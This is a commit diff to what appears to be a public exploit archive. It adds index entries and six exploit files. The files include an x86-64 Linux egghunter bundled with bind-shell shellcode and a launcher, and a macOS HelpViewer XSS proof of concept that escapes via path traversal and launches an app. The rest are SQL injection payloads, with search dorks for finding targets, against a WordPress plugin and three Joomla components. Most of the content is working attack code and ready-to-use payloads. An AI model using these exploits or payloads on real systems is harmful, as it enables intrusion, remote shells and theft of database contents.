DB: 2017-02-24
6 new exploits macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read Linux/x86-64 - Egghunter Shellcode (38 bytes) WordPress Plugin Mail Masta 1.0 - SQL Injection Joomla! Component Store for K2 3.8.2 - SQL Injection Joomla! Component UserExtranet 1.3.1 - SQL Injection Joomla! Component MultiTier 3.1 - SQL Injection
This commit is contained in:
parent
c7c1c7d92e
commit
3710b90d25
7 changed files with 388 additions and 0 deletions
|
@ -15296,6 +15296,7 @@ id,file,description,date,author,platform,type,port
|
|||
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
|
||||
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
|
||||
41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
|
||||
41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -15912,6 +15913,7 @@ id,file,description,date,author,platform,type,port
|
|||
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
|
||||
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
|
||||
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
|
||||
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -37354,3 +37356,7 @@ id,file,description,date,author,platform,type,port
|
|||
41432,platforms/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps,0
|
||||
41433,platforms/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps,0
|
||||
41437,platforms/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps,0
|
||||
41438,platforms/php/webapps/41438.txt,"WordPress Plugin Mail Masta 1.0 - SQL Injection",2017-02-18,"Hanley Shun",php,webapps,0
|
||||
41440,platforms/php/webapps/41440.txt,"Joomla! Component Store for K2 3.8.2 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
|
||||
41441,platforms/php/webapps/41441.txt,"Joomla! Component UserExtranet 1.3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
|
||||
41442,platforms/php/webapps/41442.txt,"Joomla! Component MultiTier 3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
174
platforms/linux/shellcode/41439.c
Executable file
174
platforms/linux/shellcode/41439.c
Executable file
|
@ -0,0 +1,174 @@
|
|||
/**
|
||||
Copyright © 2017 Odzhan. All Rights Reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are
|
||||
met:
|
||||
|
||||
1. Redistributions of source code must retain the above copyright
|
||||
notice, this list of conditions and the following disclaimer.
|
||||
|
||||
2. Redistributions in binary form must reproduce the above copyright
|
||||
notice, this list of conditions and the following disclaimer in the
|
||||
documentation and/or other materials provided with the distribution.
|
||||
|
||||
3. The name of the author may not be used to endorse or promote products
|
||||
derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
|
||||
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
|
||||
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
||||
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
||||
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
||||
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
|
||||
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
|
||||
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||
POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
; 38 byte Egg Hunter using sys_access() for x86-64 Linux
|
||||
;
|
||||
bits 64
|
||||
|
||||
xor edi, edi ; rdi = 0
|
||||
mul edi ; rax = 0, rdx = 0
|
||||
xchg eax, esi ; rsi = F_OK
|
||||
mov dh, 10h ; rdx = 4096
|
||||
nxt_page:
|
||||
add rdi, rdx ; advance 4096 bytes
|
||||
nxt_addr:
|
||||
push rdi ; save page address
|
||||
add rdi, 8 ; try read 8 bytes ahead
|
||||
push 21
|
||||
pop rax ; rax = sys_access
|
||||
syscall
|
||||
pop rdi ; restore rdi
|
||||
cmp al, 0xF2 ; -EFAULT means bad address
|
||||
je nxt_page ; keep going until good read
|
||||
|
||||
; put your own signature here
|
||||
mov eax, 0xDEADC0DE
|
||||
scasd
|
||||
jne nxt_addr
|
||||
|
||||
scasd
|
||||
jne nxt_addr
|
||||
|
||||
jmp rdi ; jump into shellcode
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdint.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <sys/mman.h>
|
||||
|
||||
#define EGG64_SIZE 38
|
||||
|
||||
char EGG64[] = {
|
||||
/* 0000 */ "\x31\xff" /* xor edi, edi */
|
||||
/* 0002 */ "\xf7\xe7" /* mul edi */
|
||||
/* 0004 */ "\x96" /* xchg esi, eax */
|
||||
/* 0005 */ "\xb6\x10" /* mov dh, 0x10 */
|
||||
/* 0007 */ "\x48\x01\xd7" /* add rdi, rdx */
|
||||
/* 000A */ "\x57" /* push rdi */
|
||||
/* 000B */ "\x48\x83\xc7\x08" /* add rdi, 0x8 */
|
||||
/* 000F */ "\x6a\x15" /* push 0x15 */
|
||||
/* 0011 */ "\x58" /* pop rax */
|
||||
/* 0012 */ "\x0f\x05" /* syscall */
|
||||
/* 0014 */ "\x5f" /* pop rdi */
|
||||
/* 0015 */ "\x3c\xf2" /* cmp al, 0xf2 */
|
||||
/* 0017 */ "\x74\xee" /* jz 0x7 */
|
||||
/* 0019 */ "\xb8\xde\xc0\xad\xde" /* mov eax, 0xdeadc0de */
|
||||
/* 001E */ "\xaf" /* scasd */
|
||||
/* 001F */ "\x75\xe9" /* jnz 0xa */
|
||||
/* 0021 */ "\xaf" /* scasd */
|
||||
/* 0022 */ "\x75\xe6" /* jnz 0xa */
|
||||
/* 0024 */ "\xff\xe7" /* jmp rdi */
|
||||
};
|
||||
|
||||
// sig is 0xDEADC0DE
|
||||
#define EGG_SIG "\xDE\xC0\xAD\xDE"
|
||||
|
||||
// 71 byte bind shell for x86-64 Linux.
|
||||
// listens on 0.0.0.0:1234
|
||||
//
|
||||
// port offset is 0x010
|
||||
//
|
||||
char BS[] = {
|
||||
EGG_SIG
|
||||
EGG_SIG
|
||||
/* 0000 */ "\x6a\x29" /* push 0x29 */
|
||||
/* 0002 */ "\x58" /* pop rax */
|
||||
/* 0003 */ "\x6a\x01" /* push 0x1 */
|
||||
/* 0005 */ "\x5e" /* pop rsi */
|
||||
/* 0006 */ "\x6a\x02" /* push 0x2 */
|
||||
/* 0008 */ "\x5f" /* pop rdi */
|
||||
/* 0009 */ "\x99" /* cdq */
|
||||
/* 000A */ "\x0f\x05" /* syscall */
|
||||
/* 000C */ "\x97" /* xchg edi, eax */
|
||||
/* 000D */ "\xbb\x02\xff\x04\xd2" /* mov ebx, 0xd204ff02 */
|
||||
/* 0012 */ "\xfe\xc7" /* inc bh */
|
||||
/* 0014 */ "\x53" /* push rbx */
|
||||
/* 0015 */ "\x54" /* push rsp */
|
||||
/* 0016 */ "\x5e" /* pop rsi */
|
||||
/* 0017 */ "\xb2\x10" /* mov dl, 0x10 */
|
||||
/* 0019 */ "\xb0\x31" /* mov al, 0x31 */
|
||||
/* 001B */ "\x0f\x05" /* syscall */
|
||||
/* 001D */ "\x31\xf6" /* xor esi, esi */
|
||||
/* 001F */ "\xb0\x32" /* mov al, 0x32 */
|
||||
/* 0021 */ "\x0f\x05" /* syscall */
|
||||
/* 0023 */ "\xb0\x2b" /* mov al, 0x2b */
|
||||
/* 0025 */ "\x0f\x05" /* syscall */
|
||||
/* 0027 */ "\x97" /* xchg edi, eax */
|
||||
/* 0028 */ "\x96" /* xchg esi, eax */
|
||||
/* 0029 */ "\xb0\x21" /* mov al, 0x21 */
|
||||
/* 002B */ "\x0f\x05" /* syscall */
|
||||
/* 002D */ "\x83\xee\x01" /* sub esi, 0x1 */
|
||||
/* 0030 */ "\x79\xf7" /* jns 0x29 */
|
||||
/* 0032 */ "\x31\xf6" /* xor esi, esi */
|
||||
/* 0034 */ "\x50" /* push rax */
|
||||
/* 0035 */ "\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* mov rcx, 0x68732f2f6e69622f */
|
||||
/* 003F */ "\x51" /* push rcx */
|
||||
/* 0040 */ "\x54" /* push rsp */
|
||||
/* 0041 */ "\x5f" /* pop rdi */
|
||||
/* 0042 */ "\x99" /* cdq */
|
||||
/* 0043 */ "\xb0\x3b" /* mov al, 0x3b */
|
||||
/* 0045 */ "\x0f\x05" /* syscall */
|
||||
};
|
||||
|
||||
void xcode(char *s, int len)
|
||||
{
|
||||
uint8_t *p;
|
||||
|
||||
p=(uint8_t*)mmap (0, len,
|
||||
PROT_EXEC | PROT_WRITE | PROT_READ,
|
||||
MAP_ANON | MAP_PRIVATE, -1, 0);
|
||||
|
||||
memcpy(p, s, len);
|
||||
|
||||
// execute
|
||||
((void(*)())p)();
|
||||
|
||||
munmap ((void*)p, len);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
uint8_t *sc=(uint8_t*)mmap (0, sizeof(BS),
|
||||
PROT_EXEC | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
|
||||
|
||||
if (sc != NULL) {
|
||||
memcpy (sc, BS, sizeof(BS));
|
||||
xcode (EGG64, EGG64_SIZE);
|
||||
munmap((void*)sc, sizeof(BS));
|
||||
}
|
||||
return 0;
|
||||
}
|
69
platforms/macos/remote/41443.html
Executable file
69
platforms/macos/remote/41443.html
Executable file
|
@ -0,0 +1,69 @@
|
|||
<!--
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
|
||||
|
||||
HelpViewer is an application and using WebView to show a help file.
|
||||
You can see it simply by the command:
|
||||
open /Applications/Safari.app/Contents/Resources/Safari.help
|
||||
|
||||
or using "help:" scheme:
|
||||
help:openbook=com.apple.safari.help
|
||||
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
|
||||
|
||||
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
|
||||
|
||||
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
|
||||
|
||||
PoC:
|
||||
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
|
||||
|
||||
The attached poc will pop up a Calculator.
|
||||
|
||||
Tested on macOS Sierra 10.12.1 (16B2659).
|
||||
-->
|
||||
|
||||
<script>
|
||||
|
||||
/*
|
||||
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
|
||||
|
||||
HelpViewer is an application and using WebView to show a help file.
|
||||
You can see it simply by the command:
|
||||
open /Applications/Safari.app/Contents/Resources/Safari.help
|
||||
|
||||
or using "help:" scheme:
|
||||
help:openbook=com.apple.safari.help
|
||||
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
|
||||
|
||||
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
|
||||
|
||||
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
|
||||
|
||||
PoC:
|
||||
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
|
||||
|
||||
The attached poc will pop up a Calculator.
|
||||
|
||||
Tested on macOS Sierra 10.12.1 (16B2659).
|
||||
|
||||
*/
|
||||
|
||||
function main() {
|
||||
function second() {
|
||||
var f = document.createElement("iframe");
|
||||
f.onload = () => {
|
||||
f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
|
||||
};
|
||||
|
||||
f.src = "help:openbook=com.apple.safari.help";
|
||||
|
||||
document.documentElement.appendChild(f);
|
||||
}
|
||||
|
||||
var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
|
||||
|
||||
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
|
||||
}
|
||||
|
||||
main();
|
||||
|
||||
</script>
|
80
platforms/php/webapps/41438.txt
Executable file
80
platforms/php/webapps/41438.txt
Executable file
|
@ -0,0 +1,80 @@
|
|||
# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
|
||||
# Date: 02/18/2017
|
||||
# Exploit Author: Hanley Shun
|
||||
# Vendor Homepage: https://github.com/hamkovic/
|
||||
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
|
||||
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]
|
||||
|
||||
|
||||
Mail-Masta SQL Injection
|
||||
|
||||
Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)
|
||||
|
||||
GET Parameter: list_id
|
||||
|
||||
http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
|
||||
|
||||
|
||||
csvexport.php:
|
||||
|
||||
$list_id=$_GET['list_id'];
|
||||
global $wpdb;
|
||||
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
|
||||
$masta_list = $wpdb->prefix . "masta_list";
|
||||
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
|
||||
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
|
||||
$wp_list=$wpdb->get_results($check_sql);
|
||||
$wp_list_s=$wpdb->get_results($check_list);
|
||||
|
||||
|
||||
Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)
|
||||
|
||||
GET Parameter: filter_list
|
||||
|
||||
http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1
|
||||
|
||||
|
||||
view-list.php:
|
||||
|
||||
global $wpdb;
|
||||
$list_id = $_GET['filter_list'];
|
||||
$masta_list = $wpdb->prefix . "masta_list";
|
||||
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
|
||||
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
|
||||
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));
|
||||
|
||||
|
||||
Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)
|
||||
|
||||
POST Parameter: camp_id
|
||||
|
||||
http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php
|
||||
|
||||
|
||||
count_of_send.php:
|
||||
|
||||
include($_GET['pl']);
|
||||
global $wpdb;
|
||||
$camp_id=$_POST['camp_id'];
|
||||
$masta_reports = $wpdb->prefix . "masta_reports";
|
||||
$count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1");
|
||||
|
||||
|
||||
Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)
|
||||
|
||||
POST Parameter: list_id
|
||||
|
||||
campaign_save.php:
|
||||
|
||||
$list_id=$_POST['list_id'];
|
||||
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");
|
||||
|
||||
|
||||
POST /wp-admin/admin-ajax.php?id= HTTP/1.1
|
||||
|
||||
...snip...
|
||||
|
||||
action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
|
||||
|
17
platforms/php/webapps/41440.txt
Executable file
17
platforms/php/webapps/41440.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_k2store
|
||||
# Date: 23.02.2017
|
||||
# Vendor Homepage: http://jworkplace.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/
|
||||
# Demo: http://k2store.jworkplace.com/
|
||||
# Version: 3.8.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL]
|
||||
# # # # #
|
19
platforms/php/webapps/41441.txt
Executable file
19
platforms/php/webapps/41441.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_userextranet
|
||||
# Date: 23.02.2017
|
||||
# Vendor Homepage: http://www.beesto.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
|
||||
# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
|
||||
# Version: 1.3.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
|
||||
# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# # # # #
|
23
platforms/php/webapps/41442.txt
Executable file
23
platforms/php/webapps/41442.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_multitier
|
||||
# Date: 23.02.2017
|
||||
# Vendor Homepage: http://www.beesto.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/
|
||||
# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo
|
||||
# Version: 3.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL]
|
||||
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
|
||||
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL]
|
||||
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
|
||||
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL]
|
||||
# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- -
|
||||
# # # # #
|
Loading…
Add table
Reference in a new issue